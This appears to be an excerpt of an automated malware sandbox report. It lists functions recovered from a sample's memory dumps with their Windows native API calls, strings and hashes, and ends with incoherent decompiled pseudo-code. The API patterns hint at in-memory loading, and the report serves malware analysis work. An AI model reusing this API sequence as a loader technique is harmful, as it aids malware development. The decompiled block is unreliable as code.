Instruction Fuzzy Hash: 2191D37290024DABDF21DFA5CC89EEEBBB9FF49705F004055FA09EA150D731AA54DB60

Uniqueness

Uniqueness Score: -1.00%

Function 059C1C2B, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 124nativefilememoryCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(000000FF,00000000,?,00000018,00000000), ref: 059C1C6F
NtOpenFile.NTDLL(?,00120089,?,?,00000001,00000040), ref: 059C1CFF
NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000004), ref: 059C1D3B
NtReadFile.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000), ref: 059C1D64

Strings

\??\, xrefs: 059C1C4F, 059C1C52
wcsl, xrefs: 059C1CA5
en\??\, xrefs: 059C1D73

Memory Dump Source

Source File: 00000000.00000002.512894975.00000000059C0000.00000040.00000001.sdmp, Offset: 059C0000, based on PE: false

Similarity

API ID: File$AllocateInformationMemoryOpenProcessQueryReadVirtual
String ID: \??\$en\??\$wcsl
API String ID: 3123795954-2781163289
Opcode ID: 9d196668dd853f8673e4fedca3662eaa64dbbfc4a189e147512ad2b14dd7e208
Instruction ID: 3fd9c2b8e42428c6d2b9f8466596d91cf8ad40475455fb2a7b996321339b477b
Opcode Fuzzy Hash: 9d196668dd853f8673e4fedca3662eaa64dbbfc4a189e147512ad2b14dd7e208
Instruction Fuzzy Hash: 4341B2B290025CAFDB20CFD4DC85EEEBBBCEF08310F14415AEA19E6250D7749A45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 059C00AD, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 92nativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,0000000C,?), ref: 059C0199
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000002), ref: 059C01B8

Strings

wcsl, xrefs: 059C0149
NtMapViewOfSectionNtOpenSection, xrefs: 059C0128, 059C012B
@, xrefs: 059C018C
en, xrefs: 059C0150
NtOpenSection, xrefs: 059C011D, 059C0120

Memory Dump Source

Source File: 00000000.00000002.512894975.00000000059C0000.00000040.00000001.sdmp, Offset: 059C0000, based on PE: false

Similarity

API ID: Section$OpenView
String ID: @$NtMapViewOfSectionNtOpenSection$NtOpenSection$en$wcsl
API String ID: 2380476227-2634024955
Opcode ID: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
Instruction ID: 8c8c79540cecdc7a4a404f57815ab9ec26c225e9a23bb78ded951694698bc89e
Opcode Fuzzy Hash: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
Instruction Fuzzy Hash: 113103B1E00258EFCB10DFE4D985ADEBBB8FF08754F20415AE514EB250E774AA05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 059D00AD, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 92nativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,0000000C,?), ref: 059D0199
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000002), ref: 059D01B8

Strings

NtMapViewOfSectionNtOpenSection, xrefs: 059D0128, 059D012B
NtOpenSection, xrefs: 059D011D, 059D0120
wcsl, xrefs: 059D0149
en, xrefs: 059D0150
@, xrefs: 059D018C

Memory Dump Source

Source File: 00000000.00000002.512913151.00000000059D0000.00000040.00000001.sdmp, Offset: 059D0000, based on PE: false

Similarity

API ID: Section$OpenView
String ID: @$NtMapViewOfSectionNtOpenSection$NtOpenSection$en$wcsl
API String ID: 2380476227-2634024955
Opcode ID: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
Instruction ID: 9dd27763e55a337d72a4133fd516a21d228495b0e967ab0abda6cd44836004f1
Opcode Fuzzy Hash: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
Instruction Fuzzy Hash: D73105B1E00258AFCB10DFE4D985ADEBBB8FF08754F10815AE514EB250E774AA05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 059C1C09, Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtDelayExecution.NTDLL(00000000,?), ref: 059C1C21

Memory Dump Source

Source File: 00000000.00000002.512894975.00000000059C0000.00000040.00000001.sdmp, Offset: 059C0000, based on PE: false

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: 1c3e7cc53eb4e206c5cba6e74b2dcb3e774dbaf350b88908093e0f35f565dd1b
Instruction ID: 54ae84ab8464f00150991caf0ffcecb62ef18a85d1082eaa954023622b1a722c
Opcode Fuzzy Hash: 1c3e7cc53eb4e206c5cba6e74b2dcb3e774dbaf350b88908093e0f35f565dd1b
Instruction Fuzzy Hash: 7CD0C9B595020DBED714DBA0CC47BEEBAACEB45644F008566A502E6190E6B0A6409AB4

Uniqueness

Uniqueness Score: -1.00%

Function 01799620, Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.507222985.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b0ec1693cd735355fdd14cfef6cf66623ba88577c4e0da5c0badcfd112d3e79
Instruction ID: b877f6bda8ba944388604737ae5b587cec8d1de9f51740deb009c6c05bfe838c
Opcode Fuzzy Hash: 8b0ec1693cd735355fdd14cfef6cf66623ba88577c4e0da5c0badcfd112d3e79
Instruction Fuzzy Hash: DAA1E330A002048FDB14DBB8D885BAEFBF1AF89318F19856DD915EB385DB34D849CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01799488, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,?,?,?,?,?,?,01799430,00000040,00003000), ref: 017994F8

Strings

4#, xrefs: 01799494

Memory Dump Source

Source File: 00000000.00000002.507222985.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: false

Similarity

API ID: AllocVirtual
String ID: 4#
API String ID: 4275171209-4252767769
Opcode ID: 11df475fd872d8e267c0c7b6999d17828bf0a4a2495e27476972c5434aa64f83
Instruction ID: 0889d1135d68acbb0ccf7a408fdec5c66f8b550fc86a9f48ed5e5c6e7c69c25a
Opcode Fuzzy Hash: 11df475fd872d8e267c0c7b6999d17828bf0a4a2495e27476972c5434aa64f83
Instruction Fuzzy Hash: FB1146759002489FDB10DF9AD885BDFFBF4EB88324F108419E568A7310D375A949CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 017977BC, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,?,?,?,?,?,?,01799430,00000040,00003000), ref: 017994F8

Strings

4#, xrefs: 01799494

Memory Dump Source

Source File: 00000000.00000002.507222985.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: false

Similarity

API ID: AllocVirtual
String ID: 4#
API String ID: 4275171209-4252767769
Opcode ID: 71213a14fc5257c0c53671bcb101b62d370cd3160249c28cdae0e02a4d29f0a5
Instruction ID: 8b00df82d3f59948f8f41b54e67b57aa3660fe07db377985608b4c5f49663cb8
Opcode Fuzzy Hash: 71213a14fc5257c0c53671bcb101b62d370cd3160249c28cdae0e02a4d29f0a5
Instruction Fuzzy Hash: 791146719042489FDB10DF9AD884BDFFBF4EB88324F108429E659A7310D375A948CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 017977A4, Relevance: 1.6, APIs: 1, Instructions: 104fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNELBASE(?), ref: 01799357

Memory Dump Source

Source File: 00000000.00000002.507222985.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: dd7f6bcf3beda30439aa248ed9f7bccb2b8048eec5f206196afc9631575b79dd
Instruction ID: 73378cf6211a29253553b9fb4e9203e6954451ec6cbf8752b3f8b57dfe9dd252
Opcode Fuzzy Hash: dd7f6bcf3beda30439aa248ed9f7bccb2b8048eec5f206196afc9631575b79dd
Instruction Fuzzy Hash: B64138B0D00658DFEF10CFA9E88579EFBF1AB48318F148129E915EB384D7749889CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0179925C, Relevance: 1.6, APIs: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNELBASE(?), ref: 01799357

Memory Dump Source

Source File: 00000000.00000002.507222985.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 86ffcce06802f07139ae760b08d7215301f6e7c8c1d83dd7053fb178019a6738
Instruction ID: 20738d5a53a85272943651aa1f306091734bfc917571f9aa028a97e72235ee3a
Opcode Fuzzy Hash: 86ffcce06802f07139ae760b08d7215301f6e7c8c1d83dd7053fb178019a6738
Instruction Fuzzy Hash: 524147B0D006589FEF10CFA9E88579EFBF1AF48318F048129E915EB384D7749889CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0174D0EC, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.507100829.000000000174D000.00000040.00000001.sdmp, Offset: 0174D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0582d26fed976e951b8876c14f351c56392b97be5804d4c3880f1d343ec668a
Instruction ID: df1d443477344518f4c2f11fad31b72562bd388035053548d7fc90facc6591d8
Opcode Fuzzy Hash: f0582d26fed976e951b8876c14f351c56392b97be5804d4c3880f1d343ec668a
Instruction Fuzzy Hash: 812134B1604240EFDB11DF94D8C0B2AFB61FB98314F24C5ADEC894B246C336D806CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0174D0E7, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.507100829.000000000174D000.00000040.00000001.sdmp, Offset: 0174D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13a5dd89c4e04e7b034098b9a6b3c5328201ea2187bf87cfbe925b6137f2990e
Instruction ID: fd36a9bacf472201eb426a4c970eab68f38f3a93ecd11f4b0da3b0c35e5bbaff
Opcode Fuzzy Hash: 13a5dd89c4e04e7b034098b9a6b3c5328201ea2187bf87cfbe925b6137f2990e
Instruction Fuzzy Hash: 56118E75504280DFDB12CF54D9C4B15FB62FB44214F24C6A9DC494B656C33AD44ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 0173D041, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.507021451.000000000173D000.00000040.00000001.sdmp, Offset: 0173D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b36fe7d30fed39a3fca282a84b8d75266b78102c5e8c16f53716a419ffbadff
Instruction ID: ab2cb1eefd5537eb52a7f2a14121bdce8c84f9ec9b3838f5d615083c9e794d40
Opcode Fuzzy Hash: 3b36fe7d30fed39a3fca282a84b8d75266b78102c5e8c16f53716a419ffbadff
Instruction Fuzzy Hash: DF01F7715083849BE7304A65CC8476AFB98EF816A4F58C15AEE045A247D374D845C6B2

Uniqueness

Uniqueness Score: -1.00%

Function 0173D040, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.507021451.000000000173D000.00000040.00000001.sdmp, Offset: 0173D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47853bad27bdccde6d75a5086251d5953f9830ef96d7cea97cedbcb9870b8d15
Instruction ID: 5595019be243a3339bba94845233891082848b254e746ea0d4a5d4cc765d087c
Opcode Fuzzy Hash: 47853bad27bdccde6d75a5086251d5953f9830ef96d7cea97cedbcb9870b8d15
Instruction Fuzzy Hash: 4BF0C271404284ABEB208A19DC84B66FFA8EB81674F18C05AED080B287D3799844CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 010270C9, Relevance: .6, Instructions: 624
COMMONCrypto

Download Yara Rule

C-Code - Quality: 19%

			E010270C9(signed int __eax, void* __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi) {
				signed char _t313;
				void* _t315;
				signed int _t316;
				signed int _t317;
				signed int _t320;
				signed int _t329;
				signed int _t330;
				signed int _t342;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed char _t349;
				signed int _t350;
				signed int _t351;
				signed char _t352;
				signed int _t353;
				signed char _t354;
				signed int _t355;
				intOrPtr* _t356;
				intOrPtr* _t357;
				signed int _t358;
				signed int _t359;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed char _t369;
				signed char _t370;
				signed char _t373;
				signed char _t374;
				signed char _t375;
				signed char _t376;
				signed char _t377;
				signed char _t378;
				signed char _t379;
				signed char _t380;
				signed int _t381;
				intOrPtr* _t383;
				intOrPtr* _t385;
				intOrPtr* _t388;
				intOrPtr* _t391;
				signed int _t393;
				intOrPtr* _t394;
				signed char _t398;
				intOrPtr* _t399;
				signed char _t400;
				signed int _t401;
				signed int _t402;
				signed int* _t403;
				signed int _t408;
				signed int _t409;
				intOrPtr* _t410;
				signed int _t411;
				signed int _t412;
				char* _t413;
				signed char _t414;
				signed int _t416;
				void* _t417;
				intOrPtr* _t419;
				intOrPtr* _t420;
				signed char _t421;
				signed char _t422;
				signed int _t423;
				intOrPtr* _t424;
				intOrPtr* _t425;
				void* _t426;
				signed int _t427;
				intOrPtr* _t429;
				signed int _t432;
				void* _t433;
				intOrPtr* _t435;
				void* _t436;
				signed int* _t438;
				signed int _t440;
				void* _t441;
				intOrPtr* _t442;
				signed int _t445;
				signed int _t447;
				signed int _t449;
				signed char _t451;
				signed int _t452;
				signed char _t453;
				signed int* _t456;
				signed int* _t462;
				intOrPtr* _t465;
				signed char _t467;
				signed int _t468;
				signed int _t469;
				void* _t471;
				signed int _t473;
				signed int _t474;

				_t313 = __eax | 0xffffffff9fe00603;
				asm("sbb ecx, [0xb8000102]");
				_pop(ds);
				asm("in al, dx");
				asm("adc eax, [esi]");
				 *((intOrPtr*)(__esi + 0x113ec1b)) =  *((intOrPtr*)(__esi + 0x113ec1b)) + __ecx;
				 *__edx =  *__edx + _t313;
				asm("adc eax, [esi]");
				_t315 = (_t313 & __ecx) + (_t313 & __ecx);
				asm("sbb ebp, esp");
				asm("adc eax, [ecx]");
				 *((intOrPtr*)(_t468 + 0x10eab1e)) =  *((intOrPtr*)(_t468 + 0x10eab1e)) + _t315;
				 *((intOrPtr*)(_t468 + 0x101d91f)) =  *((intOrPtr*)(_t468 + 0x101d91f)) + __ecx;
				_t419 = __ecx + __ecx;
				_pop(ds);
				asm("scasd");
				 *_t419 =  *_t419 + _t315;
				_t316 = _t315 + _t419;
				_pop(ds);
				asm("scasd");
				 *_t419 =  *_t419 + _t316;
				_t408 = __ebx + __edx;
				_pop(ds);
				asm("scasd");
				 *_t419 =  *_t419 + _t316;
				 *((intOrPtr*)(__esi + 0x16)) =  *((intOrPtr*)(__esi + 0x16)) + _t316;
				_t317 = _t316 | 0x17000102;
				_pop(ss);
				asm("scasd");
				 *_t419 =  *_t419 + _t317;
				 *((intOrPtr*)(__esi + __edx + 0x1020d)) =  *((intOrPtr*)(__esi + __edx + 0x1020d)) + _t419;
				 *(__edi + _t468 * 4) =  *(__edi + _t468 * 4) >> 0;
				_push(es);
				 *((intOrPtr*)(__edi + _t468)) =  *((intOrPtr*)(__edi + _t468)) + _t317;
				asm("scasd");
				 *_t419 =  *_t419 + _t317;
				_t420 = _t419 + _t317;
				 *0x1020d2f =  *0x1020d2f + _t420;
				 *((intOrPtr*)(_t408 + 0x1f)) =  *((intOrPtr*)(_t408 + 0x1f)) + _t420;
				_t320 = _t317 - 0x0000000d +  *__esi | 0x16000602;
				 *(_t320 + 0x1a) =  *(_t320 + 0x1a) ^ __edx;
				 *[ss:eax+0xf] =  *[ss:eax+0xf] + _t320;
				asm("pushad");
				asm("sbb dl, [esi]");
				 *__esi =  *__esi + _t408;
				 *(_t468 + 0x1a) =  *(_t468 + 0x1a) ^ _t320;
				 *((intOrPtr*)(_t320 + 0x30)) =  *((intOrPtr*)(_t320 + 0x30)) + _t420;
				asm("outsb");
				asm("sbb al, [esi]");
				 *_t420 =  *_t420 + _t408;
				asm("sbb al, 0x1f");
				 *((intOrPtr*)(_t320 + 0x1c)) =  *((intOrPtr*)(_t320 + 0x1c)) + __edx;
				 *(_t468 + 0x1a) =  *(_t468 + 0x1a) & _t408;
				 *[ss:eax+0xf] =  *[ss:eax+0xf] + (_t320 | 0x3c000602);
				 *__edi =  *__edi + __edx;
				 *0x66000134 =  *0x66000134 & 0x0000001a;
				ss = ss;
				asm("scasd");
				 *_t420 =  *_t420 + 0x1a;
				 *((intOrPtr*)(__esi + __edx + 0x1020d)) =  *((intOrPtr*)(__esi + __edx + 0x1020d)) + _t420;
				_t421 =  *0x6020d;
				 *0x1700011A =  *0x1700011A << _t421;
				asm("loop 0x32");
				 *(__edi + 0x100) =  *(__edi + 0x100) ^ _t421;
				_t474 = _t473 ^ __edi;
				asm("sbb al, [ecx]");
				 *__edx =  *__edx + _t421;
				 *_t421 =  *_t421 ^ 0xfffffffffff9ff0f;
				asm("sbb eax, [ecx]");
				 *__esi =  *__esi + __edx;
				 *0x26000102 =  *0x26000102 ^ _t421;
				 *0x66000102 =  *0x66000102 ^ _t421;
				ss = ss;
				_t432 = __edx &  *(__edi + 0x3c00060d);
				 *(__edi + 0x4500010d) =  *(__edi + 0x4500010d) ^ _t432;
				 *(__edi + 0x50000109) =  *(__edi + 0x50000109) ^ __esi;
				_t329 = 0xfffffffffff9ff0f ^ __edi;
				 *_t421 =  *_t421 + _t329;
				_t330 = _t329 + _t408;
				asm("clc");
				 *_t421 =  *_t421 + _t330;
				 *((intOrPtr*)(_t421 + 0x31)) =  *((intOrPtr*)(_t421 + 0x31)) + _t330;
				_t409 = _t408 ^ __edi;
				asm("adc [ecx], al");
				 *((intOrPtr*)(__edi + 0x31)) =  *((intOrPtr*)(__edi + 0x31)) + _t432;
				asm("scasd");
				 *_t421 =  *_t421 + 0x1a;
				 *((intOrPtr*)(_t421 + 0x60d9731)) =  *((intOrPtr*)(_t421 + 0x60d9731)) + 0x1a;
				 *((intOrPtr*)(_t409 + __esi + 0x1600af)) =  *((intOrPtr*)(_t409 + __esi + 0x1600af)) + _t409;
				0x2119826(ss, ss, es, ss, ss);
				 *((intOrPtr*)(_t468 + 0x34)) =  *((intOrPtr*)(_t468 + 0x34)) + _t409;
				asm("scasd");
				 *_t421 =  *_t421 + 0x1a;
				 *((intOrPtr*)(_t474 + __esi + 0xd)) =  *((intOrPtr*)(_t474 + __esi + 0xd)) + _t432;
				 *((intOrPtr*)(__edi + 0x100af34)) =  *((intOrPtr*)(__edi + 0x100af34)) + _t421;
				 *((intOrPtr*)(_t432 + 0x10d9734)) =  *((intOrPtr*)(_t432 + 0x10d9734)) + _t421;
				 *((intOrPtr*)((_t330 | 0x68000102) +  *_t421 + 0x35)) =  *((intOrPtr*)((_t330 | 0x68000102) +  *_t421 + 0x35)) + _t421;
				 *0xd =  *0xd + 0xd;
				asm("stosb");
				asm("scasd");
				 *__esi =  *__esi + 0x355e009b;
				 *0x80561c9f =  *0x80561c9f << 0xc8;
				_t469 = es;
				 *_t421 =  *_t421 + 0x35;
				_t410 = _t409 + _t409;
				_t342 = _t469;
				asm("out 0x1c, eax");
				asm("enter 0x20, 0x0");
				 *_t342 =  *_t342 + 0x35;
				_t447 = _t342;
				 *((intOrPtr*)(_t421 + 0x1005121)) =  *((intOrPtr*)(_t421 + 0x1005121)) + 0x35;
				_t433 = _t432 + _t432;
				 *__esi =  *__esi & 0x00000035;
				 *__esi =  *__esi + 0x35;
				 *((intOrPtr*)(_t447 + 0x6021ad00)) =  *((intOrPtr*)(_t447 + 0x6021ad00)) + _t433;
				 *_t410 =  *_t410 + 0x35;
				_t411 = _t410 + __esi;
				 *__esi =  *__esi & 0x00000035;
				 *__esi =  *__esi + 0x35;
				 *((intOrPtr*)(_t447 + 0x6821ba00)) =  *((intOrPtr*)(_t447 + 0x6821ba00)) + _t433;
				 *0x20f400 =  *0x20f400 + 0x35;
				 *__esi =  *__esi + 0x35;
				 *((intOrPtr*)(_t447 + 0x6e21c900)) =  *((intOrPtr*)(_t447 + 0x6e21c900)) + _t433;
				 *_t447 =  *_t447 + 0x35;
				_t344 = __esi + _t411;
				 *_t344 =  *_t344 & 0x00000035;
				 *_t344 =  *_t344 + 0x35;
				 *((intOrPtr*)(_t411 + 0x7621e400)) =  *((intOrPtr*)(_t411 + 0x7621e400)) + _t433;
				 *_t447 =  *_t447 + 0x35;
				 *_t421 =  *_t421 + _t421;
				 *_t344 =  *_t344 & _t344;
				 *_t344 =  *_t344 + 0x35;
				 *((intOrPtr*)(_t411 + 0x7b21fc00)) =  *((intOrPtr*)(_t411 + 0x7b21fc00)) + _t433;
				 *__edi =  *__edi + 0x35;
				 *_t411 =  *_t411 + _t411;
				 *_t344 =  *_t344 & _t344;
				 *_t344 =  *_t344 + 0x35;
				 *((intOrPtr*)(_t411 + 0x7b221700)) =  *((intOrPtr*)(_t411 + 0x7b221700)) + _t433;
				 *__edi =  *__edi + 0x35;
				 *((intOrPtr*)(_t344 + 0x27)) =  *((intOrPtr*)(_t344 + 0x27)) + _t411;
				 *((intOrPtr*)(_t447 - 0x68ddb800)) =  *((intOrPtr*)(_t447 - 0x68ddb800)) + _t433;
				 *__edi =  *__edi + 0x35;
				 *_t447 =  *_t447 + _t411;
				 *_t344 =  *_t344 & _t344;
				 *_t344 =  *_t344 + 0x35;
				 *((intOrPtr*)(_t447 - 0x6cf1dae8)) =  *((intOrPtr*)(_t447 - 0x6cf1dae8)) + 0x35;
				 *_t344 =  *_t344 + _t421;
				 *_t447 =  *_t447 + _t344;
				 *_t344 =  *_t344 & _t344;
				 *_t344 =  *_t344 + 0x35;
				 *((intOrPtr*)(_t421 + 0x6e225718)) =  *((intOrPtr*)(_t421 + 0x6e225718)) + _t433;
				 *_t344 =  *_t344 + _t421;
				 *0x39E45658 =  *((intOrPtr*)(0x39e45658)) + _t433;
				 *_t344 =  *_t344 + 0x35;
				 *_t344 =  *_t344 + 0x35;
				_t345 = _t411;
				_t412 = _t344;
				 *((intOrPtr*)(_t412 + 0x22)) =  *((intOrPtr*)(_t412 + 0x22)) + _t433;
				asm("daa");
				 *_t345 =  *_t345 + 0x35;
				 *_t345 =  *_t345 + 0x35;
				_t346 = _t447;
				 *((intOrPtr*)(_t421 + 0xb00e422)) =  *((intOrPtr*)(_t421 + 0xb00e422)) + _t421;
				 *((intOrPtr*)(_t346 + 0x28)) =  *((intOrPtr*)(_t346 + 0x28)) + _t421;
				 *_t346 =  *_t346 + 0x35;
				 *_t346 =  *_t346 + 0x35;
				_t347 = _t345;
				_t449 = _t346;
				 *0xFFFFFFFFFC0C08F5 =  *((intOrPtr*)(0xfffffffffc0c08f5)) + 0xfc000800;
				 *_t347 =  *_t347 & _t347;
				 *_t347 =  *_t347 + 0x35;
				 *((intOrPtr*)(_t421 + 0x6e229e00)) =  *((intOrPtr*)(_t421 + 0x6e229e00)) + 0xfc000800;
				 *((intOrPtr*)(_t347 + _t347)) =  *((intOrPtr*)(_t347 + _t347)) + _t421;
				 *_t347 =  *_t347 & _t347;
				 *_t347 =  *_t347 + 0x35;
				 *((intOrPtr*)(_t449 + 0x6e22ae00)) =  *((intOrPtr*)(_t449 + 0x6e22ae00)) + 0xfc000800;
				 *((intOrPtr*)(_t347 + _t347)) =  *((intOrPtr*)(_t347 + _t347)) + _t421;
				_t445 = ss;
				 *_t347 =  *_t347 & _t347;
				 *_t347 =  *_t347 + 0x35;
				 *((intOrPtr*)(_t421 + 0x6e22c300)) =  *((intOrPtr*)(_t421 + 0x6e22c300)) + 0xfc000800;
				 *((intOrPtr*)(_t347 + _t347)) =  *((intOrPtr*)(_t347 + _t347)) + _t421;
				_push(ds);
				 *_t347 =  *_t347 & _t347;
				 *_t347 =  *_t347 + 0x35;
				 *((intOrPtr*)(_t449 - 0x6cf1dae8)) =  *((intOrPtr*)(_t449 - 0x6cf1dae8)) + 0x35;
				 *((intOrPtr*)(_t347 + _t347)) =  *((intOrPtr*)(_t347 + _t347)) + _t421;
				asm("insd");
				 *_t347 =  *_t347 & _t347;
				 *_t347 =  *_t347 + 0x35;
				 *((intOrPtr*)(_t421 + 0x6e225718)) =  *((intOrPtr*)(_t421 + 0x6e225718)) + 0xfc000800;
				 *((intOrPtr*)(_t347 + _t347)) =  *((intOrPtr*)(_t347 + _t347)) + _t421;
				 *_t347 = gs;
				 *_t347 =  *_t347 + 0x35;
				 *_t347 =  *_t347 + 0x35;
				_t413 = _t412 + 0xfc000800;
				_t349 = _t449 &  *_t445;
				 *((intOrPtr*)(_t349 + _t349)) =  *((intOrPtr*)(_t349 + _t349)) + _t421;
				asm("les ebp, [eax]");
				 *_t349 =  *_t349 + 0x35;
				 *_t349 =  *_t349 + 0x35;
				_t350 = _t347;
				_t451 = _t349;
				_t435 = 0xfc000800 + _t421;
				_t422 = _t421 &  *_t421;
				 *0x294c00 =  *0x294c00 + _t422;
				 *_t350 =  *_t350 + 0x35;
				 *((intOrPtr*)(_t451 + 0x67232300)) =  *((intOrPtr*)(_t451 + 0x67232300)) + _t435;
				 *_t451 =  *_t451 + _t422;
				 *((intOrPtr*)(_t350 + 0x29)) =  *((intOrPtr*)(_t350 + 0x29)) + _t350;
				 *((intOrPtr*)(_t451 - 0x6adc9000)) =  *((intOrPtr*)(_t451 - 0x6adc9000)) + _t435;
				 *_t422 =  *_t422 + 0xfc000800;
				 *_t350 =  *_t350 + _t350;
				_t351 = _t350 -  *_t350;
				 *_t351 =  *_t351 + 0x35;
				 *((intOrPtr*)(_t451 + 0x29239300)) =  *((intOrPtr*)(_t451 + 0x29239300)) + _t435;
				 *0xfc000800 =  *0xfc000800 + 0xfc000800;
				 *0x35E45E37 =  *((intOrPtr*)(0x35e45e37)) + _t422;
				 *_t351 =  *_t351 + 0x35;
				 *((intOrPtr*)(_t422 - 0x48dc4000)) =  *((intOrPtr*)(_t422 - 0x48dc4000)) + _t435;
				 *_t413 =  *_t413 + 0xfc000800;
				 *_t451 =  *_t451 + _t413;
				 *_t351 =  *_t351 & _t351;
				 *_t351 =  *_t351 + 0x35;
				 *((intOrPtr*)(_t451 - 0x6cf1dae8)) =  *((intOrPtr*)(_t451 - 0x6cf1dae8)) + 0x35;
				 *_t451 =  *_t451 + _t435;
				 *((intOrPtr*)(0x35e45e37)) =  *((intOrPtr*)(0x35e45e37)) + _t351;
				_t352 = _t451;
				_t452 = _t351;
				_t144 = _t474 + 0x1602b0;
				 *_t144 =  *((intOrPtr*)(_t474 + 0x1602b0)) + _t422;
				if( *_t144 >= 0) {
					 *_t352 =  *_t352 + 0x35;
					 *_t352 =  *_t352 + 0x35;
					_t467 = _t352;
					 *((intOrPtr*)(_t413 + 0x10)) =  *((intOrPtr*)(_t413 + 0x10)) + _t422;
					 *0xfc000800 =  *0xfc000800 + 1;
					asm("sbb [eax], al");
					L3();
					 *((intOrPtr*)(_t467 + 0x52106b00)) =  *((intOrPtr*)(_t467 + 0x52106b00)) + _t435;
					_t413 = _t413 +  *0xfc000800;
					 *((intOrPtr*)(0x39e45637 + _t474)) =  *((intOrPtr*)(0x39e45637 + _t474)) + _t422;
					 *((intOrPtr*)(_t413 + 0x10)) =  *((intOrPtr*)(_t413 + 0x10)) + _t422;
					 *_t413 =  *_t413 + 0x1c;
					_t352 = _t467 + _t467;
				}
				 *_t352 =  *_t352 + _t352;
				 *((intOrPtr*)(_t452 - 0x35db5c00)) =  *((intOrPtr*)(_t452 - 0x35db5c00)) + _t435;
				_t414 = _t413 +  *0x2d7800;
				 *_t352 =  *_t352 + _t352;
				 *((intOrPtr*)(_t452 + 0x40f8300)) =  *((intOrPtr*)(_t452 + 0x40f8300)) + _t435;
				_t353 = _t452;
				_t453 = _t352;
				 *((intOrPtr*)(_t414 + 0x1f04040f)) =  *((intOrPtr*)(_t414 + 0x1f04040f)) + _t353;
				 *_t353 =  *_t353 + _t353;
				 *[cs:eax] =  *[cs:eax] + _t353;
				 *_t353 =  *_t353 + _t353;
				_t354 = _t422;
				_t423 = _t353;
				 *0x59E89F5B =  *((intOrPtr*)(0x59e89f5b)) + _t435;
				 *((intOrPtr*)(_t354 + 0x2e)) =  *((intOrPtr*)(_t354 + 0x2e)) + _t423;
				 *((intOrPtr*)(_t423 - 0x37db3400)) =  *((intOrPtr*)(_t423 - 0x37db3400)) + _t435;
				_t355 = _t354 + 0x22;
				 *_t453 =  *_t453 + _t414;
				 *_t355 =  *_t355 & _t355;
				 *_t355 =  *_t355 + _t355;
				 *((intOrPtr*)(_t453 - 0x6cf1dae8)) =  *((intOrPtr*)(_t453 - 0x6cf1dae8)) + _t355;
				 *0x315000 =  *0x315000 + _t355;
				 *_t355 =  *_t355 + _t355;
				 *((intOrPtr*)(_t414 - 0x66f07600)) =  *((intOrPtr*)(_t414 - 0x66f07600)) + _t355;
				_t356 = _t355 +  *0x211e00;
				 *_t356 =  *_t356 + _t356;
				 *((intOrPtr*)(_t453 - 0x6cf1dae8)) =  *((intOrPtr*)(_t453 - 0x6cf1dae8)) + _t356;
				 *_t453 =  *_t453 + _t356;
				 *((intOrPtr*)(_t423 + 0x21)) =  *((intOrPtr*)(_t423 + 0x21)) + _t414;
				 *_t356 =  *_t356 + _t356;
				 *_t356 =  *_t356 + _t356;
